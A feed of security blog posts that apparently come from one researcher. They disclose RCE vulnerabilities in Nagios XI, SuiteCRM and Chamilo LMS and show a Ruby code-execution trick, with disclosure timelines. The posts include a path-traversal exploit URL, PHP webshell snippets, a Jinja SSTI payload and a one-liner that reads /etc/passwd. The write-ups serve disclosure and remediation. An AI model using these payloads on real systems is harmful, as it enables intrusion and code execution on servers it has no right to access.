The route_request() function is responsible for mapping requests based on parameters set. In this case, we are interested in the rename parameter, which if set routes the request to the do_rename() function, which is defined on line 609:

function do_rename()
{

    $ts = grab_request_var("rename", "");
    $file = grab_request_var("file", "");
    $new_name = grab_request_var("new_name", "");
    $cancel = grab_request_var("cancel", 0);

    // Get actual name
    $name = sprintf(_('Snapshot %s'), $ts);
    if (strpos($file, '.') !== false) {
        $name = substr($file, 0, strpos($file, '.'));
    }

    if ($ts == '' || $file == '' || $cancel) {
        return;
    }

    if (!$new_name) {
...Omitted for brevity...
        <?php
        do_page_end(true);
        exit();

    } else {

        //
        // RENAME THE ARCHIVED SNAPSHOT
        //

        // Actually set the name!
        $command_data = array();
        $command_data[0] = str_replace(".tar.gz", "", $file);
        $command_data[1] = $new_name . "." . $ts;
        $command_data = serialize($command_data);

        // Send command to the subsystem
        $id = submit_command(COMMAND_RENAME_ARCHIVE_SNAPSHOT, $command_data);

        if ($id <= 0) {
...Omitted for brevity...

Three variables are set: rename -> $ts, file -> $file, and new_name -> $new_name. First, the name of the file minus the extension is retrieved from the $file parameter. Next, payload used to execute the shell command is created as an array $command_data[]. We can see $command[0] is the value of $file with the substring .tar.gz removed. We can also see $command_data[1] is set to $new_name . $ts, therefore the rename parameter ultimately ends up being the extension type.

Finally, this array is passed to serialize() and then passed to the submit_command() function. This function is located within a source protected file, therefore the tool pspy was leveraged to observe shell commands executed.

When submitting a command such as the following:

http://192.168.122.248/nagiosxi/admin/coreconfigsnapshots.php?rename=php&file=../../../../../../../../../../../../../../usr/share/snmp/mibs/shell&new_name=/../../../../../../../../../usr/local/nagiosxi/html/tools/shell

The pspy output showed the following mv command:

2024/11/03 19:41:07 CMD: UID=1001  PID=142674 | mv /usr/local/nagiosxi/nom/checkpoints/nagioscore//archives/../../../../../../../../../../../../../../usr/share/snmp/mibs/shell.txt /usr/local/nagiosxi/nom/checkpoints/nagioscore//archives//../../../../../../../../../usr/local/nagiosxi/html/tools/shell.php.txt 
2024/11/03 19:41:07 CMD: UID=1001  PID=142675 | mv /usr/local/nagiosxi/nom/checkpoints/nagioscore//archives/../../../../../../../../../../../../../../usr/share/snmp/mibs/shell /usr/local/nagiosxi/nom/checkpoints/nagioscore//archives//../../../../../../../../../usr/local/nagiosxi/html/tools/shell.php 
2024/11/03 19:41:07 CMD: UID=1001  PID=142676 | mv /usr/local/nagiosxi/nom/checkpoints/nagioscore//../nagiosxi/archives/../../../../../../../../../../../../../../usr/share/snmp/mibs/shell_nagiosql.sql.gz /usr/local/nagiosxi/nom/checkpoints/nagioscore//../nagiosxi/archives//../../../../../../../../../usr/local/nagiosxi/html/tools/shell.php_nagiosql.sql.gz

The second command is responsible for moving the shell file from usr/share/snmp/mibs/shell to /usr/local/nagiosxi/html/tools/shell.php due to the directory traversal sequences in file and new_name, and control of the file extension via the rename parameter.

Proof of Concept

I would have done curl commands, however the nsp variable being required in POST requests made it a little more complicated…

The following script can be used to prove the vulnerability out using the following format (it is overly verbose for assistance in identifying/remediating the vulnerability):

$ python3 exploit.py http://192.168.122.248/nagiosxi/ nagiosadmin 'Passw0rd!' 'id'
[*] Making upload POST request to http://192.168.122.248/nagiosxi/admin/mibs.php
[+] Seems like upload worked
[*] Making snapshot move GET request to http://192.168.122.248/nagiosxi/admin/coreconfigsnapshots.php
[+] Seems like file move worked!
[*] Making shell request to http://192.168.122.248/nagiosxi/tools/shell.php
[*] Output
uid=33(www-data) gid=33(www-data) groups=33(www-data),114(Debian-snmp),1001(nagios),1002(nagcmd)

Exploit source

The python script above exploit.py is available here: nagios_path-traversal_rce.txt

Conclusion

It’s been a while since I found/reported something, so this was a fun one to get back in the saddle. I really enjoy stuff where it takes stringing a couple issues together to get impact!

I also reported a SQL injection three days later, however it apparently was a duplicate report and patched in the release three days after my report, so nice work to whomever found it!

References

  • https://www.nagios.com/changelog/
  • https://www.nagios.com/products/security/

Timeline

Date Update
03NOV2024 Issue reported to security@nagios.com
05NOV2024 Receipt of vulnerabilities acknowledged by Nagios
06DEC2024 Requested update on vulnerabilities
06DEC2024 Nagios replies to notify that fixes will be relased and requested two weeks after patching before public disclosure of vulnerabilities
12DEC2024 Observed updates released at https://www.nagios.com/changelog/
12DEC2024 I requested a CVE for this issue via https://cveform.mitre.org/
06JAN2025 Confirmed with Nagios that public disclosure was in good faith with the elapsed time
06JAN2025 Nagios confirms full disclosure is OK
07JAN2025 This article is published. CVE is still pending
28AUG2025 CVE-2024-13986 issued via request from VulnCheck
]]>M. Cory BillingtonCVE-2021-42840 SuiteCRM RCE Log File Extension 22021-05-20T00:00:00+00:002021-05-20T00:00:00+00:00https://theyhack.me/CVE-2021-42840-SuiteCRM-RCE-2CVE-2021-42840

This one will be a bit short, since severity/impact/video/etc is all identical to my post on the previous SuiteCRM RCE.

Metasploit module: suitecrm_log_file_rce.rb

During remediation testing of CVE-2020-28328 I dug a bit deeper and found another bypass for file extensions that was so simple, I’m a bit embarrassed I didn’t spot it on the first go.

Technical details

So, once the previous fix was released, I obviously wanted to check out what they did.

The Fix for CVE-2020-28328, which can be found in my previous post as well.

if ($value === '') {
    $GLOBALS['log']->security("Log file extension can't be blank.");
    continue;
}

So, now the log file extension can’t be blank. ezpz. Well… There is another little hole in the equation, though I’m sure some of the ninjas reading this post can probably find even more.

I looked down a few lines and config['upload_badext'] caught my eye on line 86.

$trim_value = preg_replace('/.*\.([^\.]+)$/', '\1', $value);
if (in_array($trim_value, $this->config['upload_badext'])) {
    $GLOBALS['log']->security("Invalid log file extension: trying to use invalid file extension '$value'.");
    continue;
}

I wondered what was in that array… So, I used the trusty search feature in GitHub and searched upload_badext and a few results down, I see a promising code snippet in download_modules.php on line 60 under the /install/ directory.

if (empty($sugar_config['upload_badext'])) {
    $sugar_config['upload_badext'] = array('php', 'php3', 'php4', 'php5', 'pl', 'cgi', 'py', 'asp', 'cfm', 'js', 'vbs', 'html', 'htm');
}

The key thing to note here is that the user input was never converted to lower-case before being compared to the values in that array. So, if you use something like .pHp for the logger_file_ext value, you can perform the exact same attack I outlined in my previous post (or if you just want the exploit, EDB-49001).

I know… I can’t believe I didn’t check for this before. I feel so silly…

The new fix

$badext = array_map('strtolower', $this->config['upload_badext']);
if (in_array(strtolower($trim_value), $badext)) {
    $GLOBALS['log']->security("Invalid log file extension: trying to use invalid file extension '$value'.");
    continue;
}

So you can see now that they now coonvert all the “bad extensions” from the config to lowercase, as well as the incoming extension.

So anyways, another point goes to testing fixes. Even if they did fix the original issue, maybe you overlooked something super simple and you find another bug!

Timeline

[06 NOV 2020] : Issue reported to security@suitecrm.com
[13 NOV 2020] : Issue verified by SuiteCRM [28 APR 2021] : Version 7.11.19 released with fix
[18 MAY 2021] : Email SuiteCRM to request status of CVE ID
[20 MAY 2021] : This article published
[21 MAY 2021] : Email SuiteCRM to request status of CVE ID
[21 MAY 2021] : SuiteCRM replies CVE is still pending
[22 MAY 2021] : Metasploit module submitted: pull request
[03 JUN 2021] : Metasploit module merged into rapid7:master: commit

]]>M. Cory BillingtonCVE-2021-31933 Chamilo LMS File Upload RCE2021-04-21T00:00:00+00:002021-04-21T00:00:00+00:00https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCEPath traversal in File Upload leads to Remote Code Execution in Chamilo LMS

Overview

It’s been a bit since I spent some time looking for a web vuln… And this one was a great one to come back to.
This vulnerability allowed me to use a feature (which I later found was not needed any longer) that I found just by browsing the file system in the web root looking for interesting files. I identified a file named /main/upload/upload.php and started tampering with it. Through source code review, I identified a parameter that did not check user input which allowed me to specify any location on the file system through directory traversal. I could then upload to any location on the file system where the user running the web server process could write to.

Since I had complete control over the contents of the file, I next located a few places in the web root where I could write files (most directories were owned by root and restricted to root:root for writing, so I had limited options). One of them was not protected by the included .htaccess file, so that was a candidate for code execution.

The last hurdle was bypassing the php2phps() function that would rename php files and many of the variations to phps. However, phar was not renamed which enabled me to upload arbitrary php code and execute it as shell.phar.

I then had all of the pieces to achieve remote code execution from the perspective of an authenticated administrative user and was able to get a reverse shell as the www-data user. Shortly after, I wrote a full Proof of Concept in python and submitted a detailed report to security@chamilo.org, which I located through their security issues wiki page.

Chamilo was, by far, the most responsive organization I have ever dealt with for disclosing a vulnerability. Other organizations should view them as a model of how to handle a vulnerability being responsibly disclosed. Within two hours of me sending the report(at ~06:30 AM), they already had two patches pushed to GitHub and requested that I test them.

Environment

Operating System

Ubuntu Server 20.04.2 LTS (Focal Fossa)

Web server

Server version: Apache/2.4.41 (Ubuntu)
Server built: 2020-08-12T19:46:17

Chamilo Branch

https://github.com/chamilo/chamilo-lms/tree/b17b552e76e1c3b781a6a42c471a647d4e9b9f90

Technical Details

Directory Traversal - File Upload

I discovered this through source code analysis while hunting for interesting files. I came across /main/upload/index.php and identified a parameter curdirpath that was not sufficiently sanitized.

if (isset($_POST['curdirpath'])) {
    $path = Security::remove_XSS($_POST['curdirpath']);
} else {
    $path = '/';
}

/main/upload/upload.document.php#L22

From there, the input is passed through remove_XSS() located here: /main/inc/lib/security.lib.php#L303

This originally tipped me off, but if you look further down on upload.document.php, you’ll see that curdirpath is passed directly to handle_uploaded_document(), which resides in fileUpload.lib.php

        $new_path = handle_uploaded_document(
            $_course,
            $_FILES['user_upload'],
            $base_work_dir,
            $_POST['curdirpath'],
            api_get_user_id(),
            api_get_group_id(),
            $to_user_id,
            $_POST['unzip'],
            $_POST['if_exists']
        );

/main/upload/upload.document.php#L53

So, that other stuff didn’t even matter, but it was enough to get me to see what happened if I posted ../../../../../../../tmp/ for curdirpath. XD

To continue, handle_uploaded_document() does a lot of stuff… curdirpath is passed in as the argument $uploadPath. The important thing is that there is no validation of the input prior to utilization here:

$whereToSave = $documentDir.$uploadPath;

/main/inc/lib/fileUpload.lib.php#L318

It is verified that the file exists and is a directory, or if it doesn’t, then create the directory.
Then, after the filename is sanitized, $whereToSave is used in combination with $fileSystemName to create the variable $fullPath. Still, with no checking of the original value input through curdirpath. $filepath is also created using the original unchecked curdirpath value.

$fullPath = $whereToSave.$fileSystemName;

 // Example: /folder/picture.jpg
  $filePath = $uploadPath.$fileSystemName;

Then a switch statement determines whether to overwrite or rename based on whether or not the file already exists. For the video demo I do overwrite, but for the POC, I just leave the selection blank because it defaults to only save if the file doesn’t exist. That’s fine, because I generate a random name that probably doesn’t exist. The logic is pretty simple on how the file is put in place.

if (moveUploadedFile($uploadedFile, $fullPath)) {
    chmod($fullPath, $filePermissions);

/main/inc/lib/fileUpload.lib.php#L386

Long story short here

  • Reading other peoples’ code is hard
  • Test your assumptions

Inadequate File Name Sanitization

Chamilo sanitizes the filename using the php2phps() function, which essentially uses regex to detect the usual suspects (php[234567], phtml) and changes the filename to .phps.

function php2phps($file_name)
{
    return preg_replace('/\.(php.?|phtml.?)(\.){0,1}.*$/i', '.phps', $file_name);
}

/main/inc/lib/fileUpload.lib.php#L25

This is called through another function disable_dangerous_file() here: /main/inc/lib/fileUpload.lib.php#L300

The important catch, they forgot about .phar file types, which execute php code if you visit them in browser. So, that was my filetype of choice to upload. ### Finding a Place to Upload that will Execute Chamilo uses an .htaccess file to return a 403 if the user tries to access a specific file type in specific directories. Ideally, these conditions cover areas where the web server user www-data has write access. This is a good idea in the event that a user finds a flaw and is able to upload php files.

I found that most of the directories are owned by root. So, I did a find /var/www/html/chamilo-lms -type d -owner www-data 2>/dev/null to find all of the directories the web server user owned. One that stood out to me was the /web/ directory, as it was owned by www-data, but only the /web/css/ directory was protected by the htaccess file.

 # Prevent execution of PHP from directories used for different types of uploads
RedirectMatch 403 ^/app/(?!courses/proxy)(cache|courses|home|logs|upload|Resources/public/css)/.*\.ph(p[3457]?|t|tml|ar)$
RedirectMatch 403 ^/main/default_course_document/images/.*\.ph(p[3457]?|t|tml|ar)$
RedirectMatch 403 ^/main/lang/.*\.ph(p[3457]?|t|tml|ar)$
RedirectMatch 403 ^/web/css/.*\.ph(p[3457]?|t|tml|ar)$

.htaccess#L11

So, I generally just test this via a shell on the system:
echo '<?php echo `id`;?>' > test.php
And visit it in browser to see if you get the output of the id command. I found that this worked, so I knew I had a good place to upload a file.

Proof of Concept

Video

Next, I gave it a shot. This was my manual exploitation methodology.

Video here: chamilo-poc.mp4

Exploit source

CVE-2021-31933.py
EDB-49867

Timeline

[19 APR 2021 06:49] : Initial report sent to security@chamilo.org
[19 APR 2021 09:08] : Response received from Chamilo with two patches to test
[19 APR 2021 20:45] : I confirmed the patches addressed the issues
[28 APR 2021 ] Issue disclosed via Chamilo Security Issues page. They requested that I wait until after 12 MAY 2021 to disclose in order to give users a chance to patch. I was happy to do so.
[30 APR 2021] : CVE-2021-31933 assigned
[13 MAY 2021] : This writeup is released.

]]>M. Cory BillingtonUsing Ruby ancestors to Execute Code via the String class2020-11-22T00:00:00+00:002020-11-22T00:00:00+00:00https://theyhack.me/Ruby-Ancestorstldr/oneliner

ruby -e '"".class.ancestors[3].system("cat /etc/passwd")'

Why?

So I was doing a bit of reading on SSTI, specifically that of Jinja/python which looks like this:

{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

For an explanation on how these work in python, I recommend checking out this writeup. Essentially, it made me wonder if you could do the same thing in ruby, and you definitely can (at least the accessing other methods part). No pwnz yet from me (though I can’t be the first to think of this, so it may be a nothingburger, or just a cool trick)

How it works

In ruby, you would start by delcaring a string:

somestring = "a string";

This would create an object from the String class. Thus, it would have access to all the methods of the String class. It also has some ancestor classes. You can access these like so:

somestring = "a string";
puts somestring.class.ancestors;

When you run that, you should see the output:

String
Comparable
Object
Kernel
BasicObject

This is an array of ancestor methods/classes of the String class. Thus, you can access them by index!

somestring = "a string";
puts somestring.class.ancestors[3];

When you run that, you should see the output:

Kernel

We are now accessing the Kernel module, which has some pretty interesting methods… The most interesting to me is the system method. Using this method, you can execute arbitrary shell commands.

somestring = "a string";
somestring.class.ancestors[3].system("cat /etc/passwd");

PoC

Demo

So, just a fun learning experience for me on how you can access things in unique ways in Ruby!

]]>M. Cory BillingtonCVE-2020-28328 SuiteCRM RCE2020-11-05T00:00:00+00:002020-11-05T00:00:00+00:00https://theyhack.me/CVE-2020-28320-SuiteCRM-RCERemediation testing

I found another vulnerability during remediation testing, and that writeup can be found here.

I recently discovered two vulnerabilities in SuiteCRM that provides an attack chain for a low privileged user to achieve code execution on the underlying operating system. The attack chain is Cross-Site Scripting, which can be used to perform Cross-Site Request Forgery, which leads to Remote Code Execution by tampering with the application configuration and poisioning a log file. This is all achieved via a file upload that contains malicious JavaScript that a low privileged user can trick a user with administrative privileges into running. The Proof-Of-Concept files and video I have attached demonstrates a low privileged user performing this attack and obtaining areverse shell on the system that is hosting SuiteCRM.
This was patched in version 7.11.17 of SuiteCRM.

Severity

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
I don’t fully agree with this rating as the exploit does require administrative access which would change PR:L to PR:H, adjusting the final score from an 8.8 to a 7.2.
I would rate it as: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Ref: https://nvd.nist.gov/vuln/detail/CVE-2020-28328

Version details

SuiteCRM Version 7.11.15

Cross-Site Scripting (XSS)

The stored Cross-Site Scripting exists in the ‘Create Documents’ file upload. A low privileged user is able to upload a file with any contents. The user can then examine the link provided to download this document and ascertain the file’s location on the filesystem by locating the id parameter. This long, random value is the name of the fileinside the /uploads/ directory. The user can place arbitrary JavaScript in this file and then send the link to another user. This can be used to hijack another user’s session and/or perform actions on that user’s behalf, which will be shown in the PoC video.

Remote Code Execution

After discovering that I could become the admin through session hijacking via the Cross-Site Scripting, I then discovered that I could control the system properties under ‘Admin → System Settings’, namely the log file property. Log file extensions were pretty well blocked, but I was able to use BurpSuite to update the ‘Log File Name’ value to be any arbitrary value, including .php extensions. I did this by submitting a request without changing anything and capturing the POST request that actually updates the values. I changed the filename via the logger_file_name parameter to shell.php and simply made the ‘Extension’ field blank. That provided a php file that I could access in browser at the webroot, but I needed some php code insidethe file to execute.
Next, I examined the output in the file and noticed that I could control input into the file via user properties if I updated a user (such as the user’s first or last name), if the logging was set to info (which I believe was default…). So, I captured a request in burp and inserted some php code <?php $id =`id`; echo $id; ?> in the last_name form field. This resulted in the output of the id command on Linux in the context of the web server user, www-data. The only characters that I could tell were escaped based on the log file are single quotes, double quotes, and back slashes. You can verify this by tail‘ing the sql log file on the backend.

Chaining the two for Cross-Site Request Forgery (One click -> shell)

I was able to perform all this as the admin user because I was able to obtain session cookies, however to have a working chain, I needed to have this execute via JavaScript in the context of the admin user. I was able to script this using a few fetch requests to perform each of these POST requests. The first one updated the system properties, the second updated the admin user’s ‘Last Name’ field, and the last performed a GET request on the newly created log file with malicious php code. The malicious php code would perform a curl request against my machine, pull down a bash reverse shell, and then pipe the output of that curl request directly to bash, executing the code. I then uploaded this using the same method that I discussed in the XSS section and revisited the new link as the admin user. With a web server hosting my bash file and a netcat listener running, I was able to get a reverse shell.

Mitigation

Cross-Site Scripting

Ensure you have AllowOveride All set in Apache. nginx does not have this setting and I did not test it on nginx.

Remote Code Execution

Update to the latest release of SuiteCRM, or at least version 7.11.17.
This is the specific fix. Commit 1618af16eaa494c4551bac961e5ac8fc3d87ab8c

Reporting to SuiteCRM

SuiteCRM was very responsive throughout the reporting process. They acknowledged the RCE, which was patched. The XSS was the result of a web server configuration so they did not acknowlede it as a vulnerability. They did, however, note that they would be updating the documentation in light of this.

Timeline

06 AUG 2020 -> Both issues reported to security@suitecrm.com
07 AUG 2020 <- SuiteCRM confirms receipt of report and raises issue with internal security team
21 AUG 2020 -> I contacted security@suitecrm.com for a follow up
25 AUG 2020 <- SuiteCRM replies regarding web server config/XSS
26 AUG 2020 -> I reply to say that the suggestion of AllowOveride All mitigates XSS
16 SEP 2020 -> I contacted security@suitecrm.com for a follow up
17 SEP 2020 <- SuiteCRM replies to confirm the issue as a partial issue
29 OCT 2020 Update released
03 NOV 2020 -> I contact security@suitecrm.com to ensure nothing else is needed on their end before releasing writeup
05 NOV 2020 <- SuiteCRM replies

Now we have released a patch for this issue and it is in the pubic domain, there is no problem with you doing a blog post on the vulnerabilities from our perspective.

05 NOV 2020 -> CVE requested by me
06 NOV 2020 <- CVE-2020-28328 issued

POC

https://www.exploit-db.com/exploits/49001

Thanks to SuiteCRM!

They were very easy to work with and I definitely plan to continue searching for and reporting vulnerabilities in this software!

]]>M. Cory Billington